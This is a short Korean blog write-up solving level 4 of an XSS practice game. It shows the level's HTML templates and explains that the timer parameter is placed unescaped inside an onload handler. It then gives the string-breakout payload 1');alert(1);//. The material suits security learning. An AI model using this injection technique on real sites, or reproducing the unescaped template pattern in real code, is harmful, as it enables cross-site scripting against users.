<!doctype html>
<html>
<head>
<!-- Internal game scripts/styles, mostly boring stuff -->
<script src="/static/game-frame.js"></script>
<link rel="stylesheet" href="/static/game-frame-styles.css" />
</head>
<body id="level4">
<img src="/static/logos/level4.png" />
<br>
<form action="" method="GET">
<input id="timer" name="timer" value="3">
<input id="button" type="submit" value="Create timer"> </form>
</form>
</body>
</html>코드를 보면 get방식으로 timer변수가 넘어간다.
<!doctype html>
<html>
<head>
<!-- Internal game scripts/styles, mostly boring stuff -->
<script src="/static/game-frame.js"></script>
<link rel="stylesheet" href="/static/game-frame-styles.css" />
<script>
function startTimer(seconds) {
seconds = parseInt(seconds) || 3;
setTimeout(function() {
window.confirm("Time is up!");
window.history.back();
}, seconds * 1000);
}
</script>
</head>
<body id="level4">
<img src="/static/logos/level4.png" />
<br>
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
<br>
<div id="message">Your timer will execute in {{ timer }} seconds.</div>
</body>
</html>timer소스 코드를 봐보자.
<img src="/static/loading.gif" onload="startTimer('{{ timer }}');" />
이부분을 조작하면 문제를 풀수있을 것 같다.
{timer}가 변수로 입력되는걸 확인했으니 timer에 조작된 값을 넣어주도록 하자
1');alert(1);//
'Write-Up > XSS-game' 카테고리의 다른 글
| [XSS game] xss-game level 6 (0) | 2021.01.26 |
|---|---|
| [XSS game] xss-game level 5 (0) | 2021.01.26 |
| [XSS game] xss-game level 3 (0) | 2021.01.26 |
| [XSS game] xss-game level 2 (0) | 2021.01.26 |
| [XSS game] xss-game level 1 (0) | 2021.01.26 |
